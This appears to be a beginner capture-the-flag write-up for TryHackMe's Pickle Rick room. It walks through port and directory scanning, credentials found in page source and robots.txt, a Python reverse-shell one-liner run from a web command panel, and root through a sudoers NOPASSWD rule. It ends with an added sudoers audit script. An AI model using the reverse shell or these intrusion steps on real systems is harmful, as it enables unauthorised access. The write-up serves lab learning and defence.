TryHackMe : Pickle Rick Writeup

In this article I will be sharing a writeup for Pickle Rick, a free room available on TryHackMe. This is a beginner-level machine, and the goal is to get all 3 ingredients to help Rick.


Challenge Link : https://tryhackme.com/room/picklerick

Initial Enumeration

I started the initial reconnaissance by running a port scan using nmap looking for open ports and services.

madhav@anton:~/ctf/thm/pickleRick▸ nmap -sC -sV -oN nmap/initial 10.10.135.192
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-29 11:48 IST
Nmap scan report for 10.10.135.192
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:42:94:66:68:4a:cb:05:31:65:b0:ed:ef:2a:cf:c2 (RSA)
|   256 9a:63:68:b2:8c:d7:4a:34:8c:05:7e:c3:6f:50:61:96 (ECDSA)
|_  256 e7:10:dc:be:ab:af:da:67:c7:67:1d:6b:51:fd:9d:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.37 seconds

We have OpenSSH running on port 22 and Apache httpd running on port 80. Let's open our web browser to enumerate port 80.

I checked the source code of the page and found a username:

Next, I performed a gobuster scan to look for hidden files and directories.

madhav@anton:~/ctf/thm/pickleRick▸ gobuster dir -u http://10.10.135.192 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.135.192
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2021/04/29 11:48:58 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882] 
/assets               (Status: 301) [Size: 315] [--> http://10.10.135.192/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]                                    
===============================================================
2021/04/29 14:06:34 Finished
===============================================================

There are several files here. I visited portal.php, but it redirected me to login.php. We have a username, but we need a password to log in. Next, I checked robots.txt and found a string there.

This is what we were looking for. I used the following credentials to log in at login.php: R1ckRul3s:Wubbalubbadubdub.

User Shell

After logging in, we are redirected to portal.php, which has a Command Panel. As the name suggests, we can execute arbitrary commands there.

I executed the which python3 command to check whether python3 is installed.

Yes, python3 is installed. Now we can use the following command to get a reverse shell back to our machine:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Before that, remember to start a netcat listener on your local machine using nc -lvnp 4444, and replace the IP address used here with your own IP.

madhav@anton:~/ctf/thm/pickleRick▸ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.135.192 57652
www-data@ip-10-10-135-192:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, I upgraded the shell to a fully interactive TTY using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
reset
Ctrl+D
export TERM=xterm-256color
stty rows 42
stty columns 149

Next, I checked the /var/www/html directory and we have our first ingredient there:

www-data@ip-10-10-135-192:/var/www/html$ ls
Sup3rS3cretPickl3Ingred.txt  assets  clue.txt  denied.php  index.html  login.php  portal.php  robots.txt
www-data@ip-10-10-135-192:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt 
*** ******* ****

We have our first ingredient; we need two more to complete the challenge. Next, I checked the /home directory. There is a user named rick, and inside rick's home directory was our second ingredient.

www-data@ip-10-10-135-192:/var/www/html$ cd /home/rick/
www-data@ip-10-10-135-192:/home/rick$ ls
second ingredients
www-data@ip-10-10-135-192:/home/rick$ cat second\ ingredients 
* ***** ****

Root Shell

I used the sudo -l command to see if we can run any command as root.

www-data@ip-10-10-135-192:/home/rick$ sudo -l
Matching Defaults entries for www-data on ip-10-10-135-192.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-135-192.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

User www-data can run any command as root, so we can get a root shell with sudo su. This was so easy! Once we are root, we can read our third ingredient in the root directory.

www-data@ip-10-10-135-192:/home/rick$ sudo su
root@ip-10-10-135-192:/home/rick# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-10-135-192:/home/rick# cd /root/
root@ip-10-10-135-192:~# cat 3rd.txt 
3rd ingredients: ***** *****
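The root cause of the privilege escalation above is a sudoers rule that lets the web server account run anything as root without a password. The following script is an added example (not part of the original writeup or the room) that audits sudoers text for exactly that pattern and flags grantees that are system accounts; the sudoers and passwd contents are constructed samples, and the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original writeup: audit sudoers rules for the
# misconfiguration that handed www-data a root shell in this room, i.e. a rule
# granting a service account any command as root without a password.
# All input below is constructed sample data, not taken from a real host.

# Constructed sudoers content, modelled on the "sudo -l" output in the writeup.
SAMPLE_SUDOERS='Defaults env_reset, mail_badpass
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
rick     ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
backup   ALL=(root) NOPASSWD:ALL'

# Constructed /etc/passwd excerpt used to tell service accounts from humans.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
rick:x:1000:1000:Rick:/home/rick:/bin/bash'

# Read sudoers text on stdin and print the grantee of every rule that allows
# ALL commands as root (runas ALL or root) with NOPASSWD. Comments are skipped.
find_nopasswd_all() {
    grep -v '^[[:space:]]*#' |
    awk '$2 ~ /^ALL=\((ALL|root)(:ALL)?\)$/ &&
         $0 ~ /NOPASSWD:[[:space:]]*ALL[[:space:]]*$/ { print $1 }'
}

# Usage: audit_service_grants "$sudoers_text" "$passwd_text"
# Prints "user uid=N" for each NOPASSWD:ALL grantee that is a non-root system
# account (uid 1..999). Such a rule turns any code execution in that service,
# like the command panel in this room, straight into root.
audit_service_grants() {
    printf '%s\n' "$1" | find_nopasswd_all | while IFS= read -r user; do
        uid=$(printf '%s\n' "$2" | awk -F: -v u="$user" '$1 == u { print $3 }')
        # Group rules (%name) and unknown users have no uid here and are skipped.
        if [ -n "$uid" ] && [ "$uid" -gt 0 ] && [ "$uid" -lt 1000 ]; then
            printf '%s uid=%s\n' "$user" "$uid"
        fi
    done
}

# Stand-alone run: report findings for the constructed sample.
audit_service_grants "$SAMPLE_SUDOERS" "$SAMPLE_PASSWD"
```

On a real host you would feed it `sudo -l` output or the contents of /etc/sudoers and /etc/sudoers.d/* together with /etc/passwd; rick's rule is not flagged because it is limited to one command.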

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Meagan.